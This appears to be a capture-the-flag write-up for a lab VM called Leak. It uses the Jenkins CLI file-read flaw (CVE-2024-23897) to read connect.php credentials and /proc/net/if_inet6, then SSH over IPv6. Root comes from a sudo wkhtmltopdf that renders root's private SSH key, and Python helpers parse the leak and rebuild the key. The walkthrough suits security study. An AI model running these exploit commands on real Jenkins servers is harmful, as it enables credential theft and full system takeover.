# Lab practice
Download: Leak
NAT, IP: 192.168.1.150
# Penetration process
# Initial information gathering
Port scan of the IPv4 address (nmap, service detection on):
```
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http    Jetty 10.0.13
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Panel de control [Jenkins]
|_http-server-header: Jetty(10.0.13)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
```
Opening 8080 in a browser shows a Jenkins login page (the instance is localized to Spanish). A quick directory scan and some clicking around give the exact version: Jenkins 2.401.2. Searching for that version turns up a usable vulnerability: the CLI's argument parser (args4j) expands any argument that starts with `@` into the contents of the named file on the Jenkins host, and the affected command then echoes those contents back in its error messages (CVE-2024-23897, fixed in 2.442 and LTS 2.426.3). Even an anonymous user can trigger it.
Fetch the CLI jar from the server itself:
wget http://192.168.1.150:8080/jnlpJars/jenkins-cli.jar
```
┌──(root㉿kali)-[~]
└─# java -jar jenkins-cli.jar -s http://192.168.1.150:8080/ -http connect-node "@/var/www/html/connect.php"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
: anonymous no tiene el permiso Nodo/Connect
$password = "g30rg3_L3@k3D";: No such agent "$password = "g30rg3_L3@k3D";" exists.
$servername = "localhost";: No such agent "$servername = "localhost";" exists.
<?php: No such agent "<?php" exists.
$username = "george";: No such agent "$username = "george";" exists.
?>: No such agent "?>" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
```
That leaks the whole of connect.php line by line: `connect-node` takes a list of agent names, so every line of the file becomes one "No such agent" complaint (commands that take a single argument only leak the first line or two). The order is not preserved, and the line that resolves to an empty name (a blank line in the file) hits the built-in node instead, which is where the Spanish "anonymous does not have the Node/Connect permission" error comes from. Credentials: george / g30rg3_L3@k3D.
They do not log in anywhere yet: there is no port 22 on the IPv4 address, so this looks like a dead end.
Searching around shows the box has to be reached over IPv6. The same file read gives the host's IPv6 addresses from /proc/net/if_inet6:
```
┌──(root㉿kali)-[~]
└─# java -jar jenkins-cli.jar -s http://192.168.1.150:8080 -http connect-node "@/proc/net/if_inet6"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
00000000000000000000000000000001 01 80 10 80 lo: No such agent "00000000000000000000000000000001 01 80 10 80 lo" exists.
fe80000000000000020c29fffed6cab6 02 40 20 80 ens33: No such agent "fe80000000000000020c29fffed6cab6 02 40 20 80 ens33" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
```
Each if_inet6 record is `<address as 32 hex digits> <ifindex> <prefix length> <scope> <flags> <interface>`, all in hex: the ens33 line is fe80::20c:29ff:fed6:cab6/64 with scope 0x20 (link-local). The `ff:fe` in the middle of the interface identifier shows it is EUI-64, derived from the VMware MAC 00:0c:29:d6:ca:b6, so the same address could also have been computed from the ARP entry for 192.168.1.150.
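To turn the two error lines above into something usable, here is an added helper (not part of the original write-up or of any Jenkins tooling) that pulls the leaked lines out of jenkins-cli's stderr, decodes each /proc/net/if_inet6 record, recovers the MAC from an EUI-64 interface identifier, and builds the `user@addr%zone` target that ssh needs for a link-local address. The stderr sample is the output shown above, embedded as a constant; the function and variable names, and the assumption that the attacker's own interface is `eth0`, are mine.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample: the stderr jenkins-cli printed above when it was fed
# "@/proc/net/if_inet6". Every line of the file comes back as one
# "No such agent" complaint.
SAMPLE_STDERR = """\
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
00000000000000000000000000000001 01 80 10 80 lo: No such agent "00000000000000000000000000000001 01 80 10 80 lo" exists.
fe80000000000000020c29fffed6cab6 02 40 20 80 ens33: No such agent "fe80000000000000020c29fffed6cab6 02 40 20 80 ens33" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
"""

AGENT_RE = re.compile(r'^.*?: No such agent "(.*)" exists\.$')

# if_inet6 scope column (hex) -> name
SCOPES = {0x00: "global", 0x10: "host", 0x20: "link", 0x40: "site"}


def leaked_lines(stderr: str) -> List[str]:
    """Recover the file lines that connect-node echoed back as unknown agent
    names. Order is whatever Jenkins printed, not necessarily file order."""
    out = []
    for line in stderr.splitlines():
        m = AGENT_RE.match(line)
        if m:
            out.append(m.group(1))
    return out


def parse_if_inet6(line: str) -> Dict[str, object]:
    """Decode one /proc/net/if_inet6 record:
    <32 hex addr> <ifindex> <prefixlen> <scope> <flags> <ifname>, all hex."""
    addr_hex, ifindex, plen, scope, flags, ifname = line.split()
    addr = ipaddress.IPv6Address(bytes.fromhex(addr_hex))
    return {
        "addr": str(addr),
        "ifindex": int(ifindex, 16),
        "prefixlen": int(plen, 16),
        "scope": SCOPES.get(int(scope, 16), scope),
        "flags": int(flags, 16),
        "ifname": ifname,
    }


def mac_from_eui64(addr: str) -> Optional[str]:
    """If the interface identifier is EUI-64 (ff:fe inserted in the middle),
    undo the universal/local bit flip and return the MAC it came from."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    mac = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:]
    return ":".join(f"{b:02x}" for b in mac)


def ssh_target(stderr: str, user: str, local_iface: str) -> Optional[str]:
    """Pick the first link-local address leaked from if_inet6 and build the
    user@addr%zone form; the zone is the attacker's OWN interface name."""
    for rec in map(parse_if_inet6, leaked_lines(stderr)):
        if rec["scope"] == "link":
            return f"{user}@{rec['addr']}%{local_iface}"
    return None


if __name__ == "__main__":
    for raw in leaked_lines(SAMPLE_STDERR):
        rec = parse_if_inet6(raw)
        print(rec["ifname"], rec["addr"], rec["prefixlen"], rec["scope"],
              "mac:", mac_from_eui64(rec["addr"]))
    print("ssh", ssh_target(SAMPLE_STDERR, "george", "eth0"))
```

A link-local address is only valid on one link, so the zone suffix is mandatory and names the attacker's interface, not the target's `ens33`; a global or ULA address from the same file would need no suffix.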
```
┌──(root㉿kali)-[~]
└─# nmap -p- -A -6 fe80:0000:0000:0000:020c:29ff:fed6:cab6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 00:56 EDT
Nmap scan report for fe80::20c:29ff:fed6:cab6
Host is up (0.00090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp   open  tcpwrapped
8080/tcp open  tcpwrapped
```
Port 22 is open over IPv6, so SSH in with the leaked password. The `%eth0` zone ID is required for a link-local address and names the attacker's interface:
```
┌──(root㉿kali)-[~]
└─# ssh -6 george@fe80:0000:0000:0000:020c:29ff:fed6:cab6%eth0
```
That gives a shell as george.
# Privilege escalation
`sudo -l` shows /usr/bin/wkhtmltopdf can be run as root. wkhtmltopdf reads whatever input path it is given and renders it into a PDF, so as root it will happily render root's SSH private key. Write the PDF under /var/www/html, fetch it over the Apache on port 80, and pull the key text back out of the PDF.
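The text that comes back out of the PDF is not always a usable key file: when wkhtmltopdf treats the input as HTML it collapses the key's newlines into spaces, so the armour markers and the base64 body end up on one line, and `pdftotext` may add form feeds. The helper below is an added example (not from the original write-up, and not part of wkhtmltopdf or OpenSSH): it finds the PEM block in the extracted text, strips all whitespace, checks the body is valid base64, and re-emits it with the markers on their own lines and the body re-wrapped (70 columns for `OPENSSH PRIVATE KEY` as ssh-keygen writes it, 64 for OpenSSL-style labels). It works whether or not the original line breaks survived. The commands in the comments, the paths, and the sample "PDF text" (whose base64 body is just the bytes 0x00..0x9f, not a real key) are assumptions I constructed.

```python
import base64
import re
from typing import List

# Assumed steps around this script (not shown in the original write-up):
#   on the target, as george:   sudo /usr/bin/wkhtmltopdf /root/.ssh/id_rsa /var/www/html/key.pdf
#   on the attacker:            wget http://192.168.1.150/key.pdf && pdftotext key.pdf key.txt
# then: python3 rebuild_key.py key.txt > id_rsa && chmod 600 id_rsa

ARMOUR_RE = re.compile(r"-----BEGIN ([A-Z ]+?)-----(.*?)-----END \1-----", re.S)


def chunk(s: str, width: int) -> List[str]:
    """Split s into fixed-width pieces (textwrap would also break on '-')."""
    return [s[i:i + width] for i in range(0, len(s), width)]


def rebuild_pem(text: str) -> str:
    """Locate the first PEM block in text, strip every whitespace character
    (spaces, newlines, form feeds) from its body, validate the base64, and
    re-emit a clean key file. Raises ValueError (binascii.Error is one) if
    there is no block or the body is not base64."""
    m = ARMOUR_RE.search(text)
    if not m:
        raise ValueError("no PEM block found")
    label = m.group(1)
    body = re.sub(r"\s+", "", m.group(2))
    base64.b64decode(body, validate=True)  # junk from OCR-style artefacts fails here
    width = 70 if label.startswith("OPENSSH") else 64
    lines = [f"-----BEGIN {label}-----", *chunk(body, width), f"-----END {label}-----"]
    return "\n".join(lines) + "\n"


def pem_payload(pem: str) -> bytes:
    """Decode the body of a clean PEM block back to bytes (for checking)."""
    return base64.b64decode("".join(pem.splitlines()[1:-1]), validate=True)


# Constructed sample of pdftotext output: one run-together line plus a
# trailing form feed, standing in for a rendered key.
FAKE_BODY = base64.b64encode(bytes(range(160))).decode()
PDF_TEXT = ("-----BEGIN OPENSSH PRIVATE KEY----- " + " ".join(chunk(FAKE_BODY, 70))
            + " -----END OPENSSH PRIVATE KEY-----\n\f")

if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else PDF_TEXT
    sys.stdout.write(rebuild_pem(src))
```

ssh refuses a key file that is group- or world-readable, so `chmod 600` before `ssh -i`; if the key decodes but ssh still rejects it, compare `pem_payload` against a known-good key of the same type, since a single base64 character mis-read from the PDF will fail validation or produce a key that does not parse.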
With the key saved locally, log in as root (no user given, so ssh uses the local root account name) and read the flag:
```
┌──(root㉿kali)-[~]
└─# ssh -i id_rsa -6 fe80:0000:0000:0000:020c:29ff:fed6:cab6%eth0
root@leak:~# cat .r00000000000000t.txt
89c441988949961e48d5085c3d70c9f1
```
That is a root shell.